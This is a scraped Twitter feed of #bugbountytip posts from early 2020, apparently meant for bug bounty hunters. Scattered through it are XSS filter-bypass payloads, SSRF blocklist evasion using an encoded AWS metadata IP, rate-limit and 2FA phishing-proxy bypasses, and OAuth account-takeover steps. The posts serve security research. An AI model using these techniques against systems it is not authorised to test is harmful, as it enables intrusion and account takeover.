1 you can visite this website if you want To see a list of websites that have been hacked before: https://t.co/TMHG53oRIW a very useful free service that offers various DNS,networking,and e-mail analysis tools: https://t.co/7eVKGC0pjK #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/Q1lc0ECSNs
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:48:02
3 Reverse Image Search: https://t.co/v4L4gqyvJY Google custom search engine: 300+ Social Networking Sites: https://t.co/WbGXl5hOUb street webcams: https://t.co/rxcrybQxsW #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/osHNr287ql
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:41:59
4 This is the world biggest directory of online surveillance security cameras: https://t.co/IubMc5i95o Simple Twitter Profile Analyzer,Tweets metadata scraper & activity analyzer: https://t.co/M6v3uQ9lll -LinkedIn Contact Extractor: https://t.co/Yh4129EoDE #bugbountytip #OSINT
HackDoor
@hackd00r


2020-02-12 06:07:19
3 AWS Solutions Architect Certification - 2020 AWS IAM Tutorial https://t.co/9GjGq8WS9o #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
GokhanGK
@gkhck_


2020-02-12 05:05:46
7 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DZ9AyAymfC
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 01:28:20
4 I enjoyed reading these books! #bugbountytip #hacking #pentest #bash #Linux https://t.co/pfIXoXwn20
Andrew Roe
@aroe1994


2020-02-12 01:27:45
0 Stream is live with some HackTheBox! Day 1 on my quest to master bug bounties. https://t.co/a2ASaTS2z3 #CyberSec #bugbountytip
The Notorious B.E.E. ๐Ÿ
@securibee


2020-02-11 19:09:26
4 Earlier today on @NahamSec Twitch stream someone asked if bug bounty is largely luck based. I replied with the following quote "Absolute Success is Luck. Relative Success is Hard Work." You can read more about it here https://t.co/KhoKqRXqjE #bugbounty #bugbountytip
baluz๐Ÿ”ฅ
@0xbalooz


2020-02-11 18:18:25
0 @OffensiveHunter @santi_lopezz99 will this tweet will be in next @intigriti and @PentesterLand blog as a #bugbountytip
Patrik Fehrenbach๐Ÿค–๏ฃฟ
@ITSecurityguard


2020-02-11 18:03:27
34 dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE ๐Ÿ‘ˆ #bugbounty #bugbountytip
Beatrix_Kiddo
@ki_twyce_


2020-02-11 17:34:54
0 My homeboy @aptSemi taught me about virtual workstations with VMware. It gave me the ability to get some experience in a linux environment. He also taught me about SQL injection and a few other things, and no I haven't done it yet ๐Ÿ‘€๐Ÿ˜‚ but I'm grateful for the #bugbountytip https://t.co/B76nNVp2hf
Your Next Bug Tip
@YourNextBugTip


2020-02-11 16:24:50
0 @santi_lopezz99 So thats why instead of naming the title you just sold @OffensiveHunter's content, Great Tip #bugbountytips #bugbountytip #bugbounty
but most of all, samy is my hero
@SecGus


2020-02-11 15:24:42
1 #bugbountytip If you find an Open Redirect, check for Reflected / DOM based XSS, sometimes it is just a case of local JS updating the DOM to redirect to whatever parameter you included, and other times the parameters contents is directly inserted into window.location.href.
Arif Khan
@payloadartist


2020-02-11 14:57:00
1 Amazing handy cheatsheets for mobile #security testing! #bugbounty #bugbountytip https://t.co/va8IVbdNjC
bughuntercat
@bughuntercat


2020-02-11 14:17:42
0 #bugbountytip Don't be gossip or envious of who knows or has more than you. Better strive to learn for yourself and don't try to steal someone else's effort as if you were a vulture.
Dominik Maล‚owiecki
@5up3rD43m0n


2020-02-11 12:23:35
0 Dear hackers when testing for XSS and trying to include remote js file, please don't forget to upgrade your SSL certificate. #LoL #bugbountytip https://t.co/voWmkahw4x
HackDoor
@hackd00r


2020-02-11 11:25:43
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/tRFLvb0ep1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-11 11:25:23
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/0gfcgW7uTM #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Pranav Hivarekar
@HivarekarPranav


2020-02-11 05:56:18
1 Blind XSS write ups: 1] https://t.co/eWtYmGPgaL 2] https://t.co/yNGKoJnlZY 3] https://t.co/WLZhTHgBYt #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-10 21:39:29
1 The best #bugbountytip I can give is not to diversify much with tools that do the same work. Test all tools which are for one task and keep the best. You'll gain more in speed and less headache
healthyoutlet
@healthyoutlet


2020-02-10 20:19:38
1 want to know if a hash that was recently generated is actually a timestamp? for i in $(seq $($(echo date +%s)-1000|bc) $($(echo date +%s)+1000|bc)); do echo $i | sha256sum; done | grep YOURHASH #bugbountytip
Doug Little Jr
@douglittlejr


2020-02-10 19:36:00
0 @LindseyGrahamSC @JudgeJeanine @seanhannity @LindseyGrahamSC, been doing #Cybersecurity bout as long as you've been doing legislating. What you did to be doing what you are doing now? Younger days possessed less self control, would be deep diving every #bigdata known 2 know. Heads up, @GOP a #bugbountytip buyer & seller https://t.co/xdb5QaRPcd
Udit Bhadauria
@udit_thakkur


2020-02-10 14:41:12
0 Weird rate_limit bypass: #bugbountytip #bypass #infosec Reported rate limit on OTP sms. Company fixed the issue. To bypass: Capture the request. Remove the country code +91 to [ ] Modify the number from xxxxx-xxxxx to +91 xxxxx-xxxxx Bypass successful. ๐Ÿ˜‚๐Ÿ˜‚
siLLyDaDDy
@sillydadddy


2020-02-10 13:24:35
0 How long it did take for you to get your first triage , after you started bug bounty hunting ? .please RT. #bugbounty #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-10 11:02:48
0 Is there any platform that provide CTFs for latest CVEs, so we can learn from them? Do @PentesterLab @hackthebox_eu have something like that? #bugbounty #bugbountytips #bugbountytip
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2020-02-10 09:15:01
0 #bugbountytip #nmap Extract subdomains from IP range. nmap IP_range | grep "domain" | awk '{print $5}' Exemple for bitdefender https://t.co/5IY0ieaOWZ
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:35:46
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/0wdvBhdOHw #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:35:08
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/EBV0NpKxBQ #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:33:11
0 StrandHogg Bug - Unpatched Android OS Vulnerability https://t.co/HlOcn2eebr #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:31:45
13 Easy Subdomain Enumeration Using Censys For Bug Bounty https://t.co/xdWLzfLtCf #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:26:56
0 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:26:39
2 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
HackDoor
@hackd00r


2020-02-10 06:03:31
0 Machine Learning With Python https://t.co/xgVzOtztBU Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
IAM Platform
@IAM__Network


2020-02-09 21:43:54
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Mohammed Israil ๐Ÿ‡ฎ๐Ÿ‡ณ
@mdisrail2468


2020-02-09 19:44:57
2 :-: If your target site having the RSS Feed turn ON, go to https://t.co/KdPwakGJNm, and search for the `generator` tag and you may find the current WordPress version being used for potentially developing the further testings steps. #bugbounty #bugbountytip
AEMSecurity
@AEMSecurity


2020-02-09 19:27:57
1 [+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip https://t.co/xmM8vLXCDT
Bogdan Bodishtyanu
@xalerafera


2020-02-09 19:21:16
0 If the attacked application blocks (" ") characters, then try using quotes instead of them) This will help you bypass the protection. <script>alert`1`</script> #bugbounty #bugbountytips #bugbountytip #hackerone https://t.co/2sAlUOjJOl
HackIsOn ยฎ
@hackison


2020-02-09 17:14:13
4 OSINT tools usage #osint #hacking #hackison #owasp #cybersecurity #linux #bugbounty #bugbountytip #bugbountytips #pentesting #vapt #wapt #CloudComputing #dataprivacy #GDPR #databreach #hacker https://t.co/3iqmOOZe9w
Nikhil Mahajan
@mahajan344


2020-02-09 16:44:54
0 Want to do static analysis of Andriod apps not sure how to get APK file, use following mirror website to download current/historical version of the app to find API end-points, hardcoded token, keys. #AndroidHackingMonth on @Hacker0x01 #bugbountytip #AndroidSecurity https://t.co/ko9uimIktc
Nikhil Mahajan
@mahajan344


2020-02-09 15:37:25
1 Found a firebase API key in the Andriod app, not sure what to do? use Pyrebase, A simple python wrapper for the Firebase API to test Authentication, DB and storage permissions. https://t.co/02ynuPy1tO #AndroidHackingMonth on @Hacker0x01 #bugbountytip
mohsin khan
@mohsink83789226


2020-02-09 12:27:10
0 HELP ?callback=something return something({"status": "failure", "code": 1, "data": "Missing required field 'scope'", "message": "Invalid parameters."}) how to exploit. #JSONP #CSP #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-09 07:44:00
0 get Bounty or get Experience 10 Facts about #BugBounty @akita_zen @ArbazKiraak https://t.co/Iderxl5Iai #bugbountytips #bugbountytip
IAM Platform
@IAM__Network


2020-02-09 07:35:30
1 IAM Platform Curated Retweet: Via: https://t.co/FPuuLisgvS #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
HackIsOn ยฎ
@hackison


2020-02-09 03:59:48
1 #owasp mobile top 10 where to look them #hacking #hackison #bugbountytip #bugbounty #bugbountytips #cybersecurity #vapt #wapt #mapt #pentesting #redteam https://t.co/BlhtVxHN5i
AEMSecurity
@AEMSecurity


2020-02-08 17:50:32
3 [+] #BugbountyTip: If you come accross /api.json in any AEM instance during bug hunting, try for web cache poisoning via following headers: Host: , X-Forwarded-Server , X-Forwarded-Host and or simply try https://localhost/api.json HTTP/1.1 #Bugbounty #TogetherWeHitHarder
IAM Platform
@IAM__Network


2020-02-08 16:44:29
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-08 14:26:12
3 different 2FA bypasses: evilginx:https://t.co/9haUXdvpV1 CredSniper:https://t.co/mFTPZYg8xY ReelPhish:https://t.co/FXtzjwgCYG Modlishka:https://t.co/mHNvbvYzF7 #pentest #hacking #phishing #redteam #bugbountytip
thehackerlab.io - jdksec.com
@jdksec


2020-02-08 13:58:16
0 Love it when a good script works first time ๐Ÿ˜‚ #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X6WRgIpWNZ
Your Next Bug Tip
@YourNextBug


2020-02-08 12:23:18
0 Read the comments for tips #bugbountytips #bugbountytip https://t.co/2ASOZQuLtA
STร–K
@stokfredrik


2020-02-08 10:04:58
5 @Zombiehelp54 wrote this great writeup on Exploiting Out Of Band XXE using internal network and php wrappers. Check it out! loved it! https://t.co/eTCHK7RvHM #bugbounty #bugbountytip #infosec #pentest #hacking
Your Next Bug Tip
@YourNextBug


2020-02-08 05:57:26
0 How many vulnerabilities you to check to find a valid one? #bugbountytips #bugbountytip #bugbounty
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-08 04:43:49
0 Since I'm nearing 1k followers... [Easily automate bug bounty alerting] I just posted a blog post all about it. Shout outs to @TomNomNom and findomain in it! https://t.co/wgmOENFxm1 #bugbountytips #bugbountytip ;) #rootgoat2020 @InsiderPhD @Edu4rdSHL #bugbounty https://t.co/zwSyop4naW
IAM Platform
@IAM__Network


2020-02-08 02:18:04
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
ghostlulz
@ghostlulz1337


2020-02-07 22:02:20
5 XSS payload blocked by your targets content security policy (CSP)? You know you can bypass the CSP with some simple techniques? Easy wins! More info on my blog: https://t.co/LqWudgPJ50 #BugBounty #bugbountytips #bugbountytip #infosec #csp #dfir #redteam #pentest #xss #appsec https://t.co/sG0TzZMhmB
offensive
@offensi74555475


2020-02-07 03:01:51
0 If you have checklist you improve what? You have back up so you can pick it easily Save your time of recalling your engagment,it's impossible if you relied on recalling info from your memory. tell me about your checklist let's share the knowledge!! #bugbountytip #infosec
offensive
@offensi74555475


2020-02-07 02:48:34
0 Having a checklist is a great way to provide some consistency to your testing.. do you have checklist? #bugbountytip #infosec #bughunt
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:29:45
2 Oneliner to get all status codes, size,url and redirect url with a ',' as a delimiter: cat webservers.txt | parallel -j50 -q curl -w 'Status:%{http_code},Size:%{size_download},%{url_effective},%{redirect_url}\n' -o /dev/null -sk #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/FQYcm6U9Is
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:24:18
0 Oneliner to get all Http Titles (if they exist) for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done | tee -a titles.txt #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X4O63pHYhz
Nick || hunt4p1zza
@ngkogkos


2020-02-06 19:45:59
3 When an org is heavily using SSO: 1. Create a browser instance and login w/ all self-registered accounts. 2. Browse to all assets you are aware of ("Open Multiple URLs" plugin). You never know where you may end up logged in due to SSO misconfiguration. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-06 18:59:24
0 #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to @Zigoo0 #bugbounty #infosec #informationsecurity https://t.co/h1spj3muxs
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 16:41:13
0 Hackdoor Corporate Training #GetCertifiedWithHackdoor Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OOUY72a4aE
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-06 14:56:00
2 Find web directories without bruteforce: https://t.co/YaIRwKnrau Abusing Certificate Transparency logs for getting HTTPS websites subdomains.: https://t.co/7mq5XiIeuv the most complete OSINT collection and reconnaissance tool: https://t.co/0uNdRKFInX #bugbountytip #Hacking
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 12:33:43
0 When Hackdoor Does #CoporateTrainings in Style ๐Ÿค–๐Ÿค– #Swag and #Sticker Distribution Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity https://t.co/k1CDcrafMP
Keshav Malik
@g0t_rOoT_


2020-02-06 10:43:15
3 Hey Hunters ๐Ÿ˜„ Here's my First Write-up on Medium regarding an Unexpected Bounty . Do give it a read. Suggestions are welcomed ! ๐Ÿ’ฏ #bugbounty #bugbountytip #bugcrowd #hackerone #responsibledisclosure https://t.co/ZF0IXHsDL6
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:39:45
0 @PaulosYibelo @Random_Robbie @MrTuxracer shodan download --limit=100000 outfile query shodan parse --fields=ip_str,port,https://t.co/qnzC7dYu8m,org,domains,hostnames --separator=";" outfile.json.gz > outfile.json 2/2 #bugbountytip
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:38:48
0 @PaulosYibelo @Random_Robbie @MrTuxracer On https, use ssl certificate information. It will show you the organization the cert was issued to. From my experience, this is the most reliable way of identifying IP. Moreover, use shodan fields like org, domains, hostnames. 1/2 #bugbountytip
Sunil Kumar Singh
@0xsunil


2020-02-06 06:18:48
0 @sshell_ Please use hashtags like #bugbounty #bugbountytip #bugbountytips to reach out more people. It becomes easier for people to know. Thanks for the tip anyway.
INTIGRITI
@intigriti


2020-02-05 19:53:52
1 How to Pwn A Pwned Citrix? Is it possible to upgrade your recon with the @discordapp and tweeted @jobertabma the best #bugbountytip of the week? All of these answers are available in the latest edition of our #BugBytes! #bugbounty ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/0Qcq2tBBQo
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-05 18:53:20
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Jd9xcmmcvp
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-02-05 17:43:11
1 โžบ Load trial continues, a marvelous load everything is forgotten. Stay with me, checkmate.. โœฎ #BugBounty #BugBountyTip #WAF #infosec https://t.co/nsPRzexTE3
โ—พ
@saurinn_


2020-02-05 13:12:21
0 Excelent methodology and so well explain #bugbountytip #fuzzing https://t.co/Jt66YL8HQV
Yadhavi
@PrincessYadhavi


2020-02-04 21:16:50
0 I have put ssh key in settings. but when SSHed to gitlab after login welcome message, session closed immediately. Why happening this? How to solve this? #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2020-02-04 20:40:50
2 Found a gitlab instance with register enabled. after logged in it looks really empty. how to escalate the severity? How to get code execution? And how to find gitlab version? #bugbountytips #bugbounty #bugbountytip
BlackClover
@Bc10ver


2020-02-04 12:10:55
0 Top story: @TakSec: 'XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bโ€ฆ https://t.co/08qZGtvhUZ, see more https://t.co/fVnXn9Z0FJ
dawgyg
@thedawgyg


2020-02-04 04:18:15
33 When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
m0z
@LooseSecurity


2020-02-03 22:42:37
1 Repost of a #XSS payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
dawgyg
@thedawgyg


2020-02-03 21:51:04
13 When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
Mike Takahashi
@TakSec


2020-02-03 20:01:52
10 XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltjUpiL4Cu
Nick || hunt4p1zza
@ngkogkos


2020-02-03 18:22:10
0 Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use @TomNomNom's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}' #bugbountytip #bugbounty
kassih mouhssine
@KassihMouhssine


2020-02-03 17:18:36
0 hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ? #BugBounty #bugbountytips #bugbountytip
Inti De Ceukelaire
@securinti


2020-02-03 16:45:39
0 @seanmeals Next time add #BugBountyTip to your post to get maximum profit
dark_warlord14
@dark_warlord14


2020-02-03 13:01:41
2 #bugbountytip #bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program. https://t.co/M3kEwoNDtI
Rafin Rahman Chy
@rafinrahmanchy


2020-02-03 11:20:45
3 Bug Bounty Hunting Methodology(Personal Made) #BugBounty #bugbountytip #bugbountytips #websecurity #webhacking #netsec #appsec #Recon #pentest #pentester #Pentesting #Hacking #Hacker #EthicalHacking #EthicalHacker #whitehathacker #InfoSec #InfoSecurity #ITSecurity #CyberSecurity https://t.co/yNmFJJeivP
Hyker Security
@hykersecurity


2020-02-02 20:00:41
2 Cyber Security News Flash by @hykersec @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were โ€ฆ https://t.co/JHa7zDItBt, see more https://t.co/nF4yR9PGZj
setec:astronomy
@infowaropcenter


2020-02-02 18:42:04
0 Top story's from my Newspaper @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentiโ€ฆ https://t.co/N5BsQh0yO4, see more https://t.co/OzpGs17X9M
Your Next Bug Tip
@YourNextBug


2020-02-02 14:48:28
0 BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins ๐Ÿ˜ˆ buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW #bugbountytips #bugbountytip #bugbounty https://t.co/isLO5QMG0w
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-02 13:02:27
0 Thanks for the awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-02 12:48:15
15 WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentionned. RT, Like and Comments are appreciated. For any pentest work DM me:) ๐ŸŽ‰๐ŸŽ‰ https://t.co/nlAv4pMPhx
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-02 12:32:58
0 Reflected XSS https://t.co/TNZFocIB07 https://t.co/qxizmngi1Y https://t.co/qkg2tCZPJt https://t.co/tDIISt8s5o https://t.co/fywnUUvRJ8 https://t.co/rR1eG6xktM https://t.co/HBCDQ9WLS4 https://t.co/Kn5J7zoqKF https://t.co/zvsERH62Ok https://t.co/01CJDlehsT #bugbounty #bugbountytip
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-02 12:31:36
0 Thanks for awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip https://t.co/MmkseVcmLQ
Sunil
@Sunilkande1137


2020-02-02 03:17:45
5 240+ good hacking resources at one place. https://t.co/Iab3Gg7Gyb #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsecย  #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-01 06:56:52
0 Haha, as excepted no one is sharing, Ok then Share the worst external bug bounty program, atleast it will save other's time. ๐Ÿ˜‰ #bugbounty #bugbountytip #BugBountyTips https://t.co/UG7ktzJX40
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-01 05:00:34
0 Watch Out for Coronavirus Phishing Scams https://t.co/B4yqri19tw Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-01 02:11:54
4 #OSINT : Better Whois:https://t.co/zqCvzqzJyy Active Whois:https://t.co/KtnxHQw6WZ ZabaSearch:https://t.co/5JhzsgJad3 TinEye:https://t.co/XCcelTU0ox isearch:https://t.co/03W18bTDhL serversniff:https://t.co/RTccIDZOJj robtex:https://t.co/xDzAcSX3iO #BugBountyTip #Hacking #pentest
Byron Smith
@MainframeGuyBS


2020-01-31 19:23:33
0 Look what I found on @LinkedIn ๐Ÿ˜Ž Have fun my friends, BUG OUT. #CyberSecurity #Security #BugBountyTip #bugbountytips #Hackers #SecurityResearcher #TheCyberSecurityHub https://t.co/8oCpnkRIly
Joe Doran
@TheRealJoeDoran


2020-01-31 18:54:09
0 What mind mapping software do you use for large scope pentests? I think Iโ€™ve outgrown plain text files. #Pentesting #BugBountyTip
Your Next Bug Tip
@YourNextBug


2020-01-31 16:40:47
3 Any good external bug bounty program? #bugbounty #bugbountytips #bugbountytip
AK
@theanonymouscub


2020-01-31 15:43:10
0 Generally people don't tweet against Chinese and Russian ...... Reason :-. They fear their mobile phones and PCs could get hacked ! #caronavirus #cornavirus #PrayForChina #hackerone #Hackers #hackathon #bugcrowd #togetherwehitharder #bugbounty #BugBountyTip
Th3Alch3mist~
@Debian_Hunter


2020-01-31 14:01:24
0 OAuth+Host Header Injection leads to Account Takeover ๐Ÿค™simple yet nice tip for beginners #bugbountytip #bughunting #infosec #bugbounty https://t.co/6qItnrR9Ky
Your Next Bug Tip
@YourNextBug


2020-01-31 13:41:59
1 Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by @ngalongc #bugbountytips #bugbountytip https://t.co/fstnEFS244
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-31 13:07:47
0 Bug Hunter Life ๐Ÿค–โœ…โค๏ธ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/zL6mBl7w1Z
youssef
@genieyou


2020-01-31 12:20:48
2 awesome idea for you blog @filedescriptor @ngalongc @EdOverflow great article congrats https://t.co/HdMi507hh4 #BugBounty #bugbountytips #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-01-31 11:32:52
4 ยป_ everything is not as it seems. ๐ŸŽƒ ยซinputยป; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; ยซinputยป; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"}; #BugBounty #BugBountyTip #WAF #infosec
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-31 10:08:16
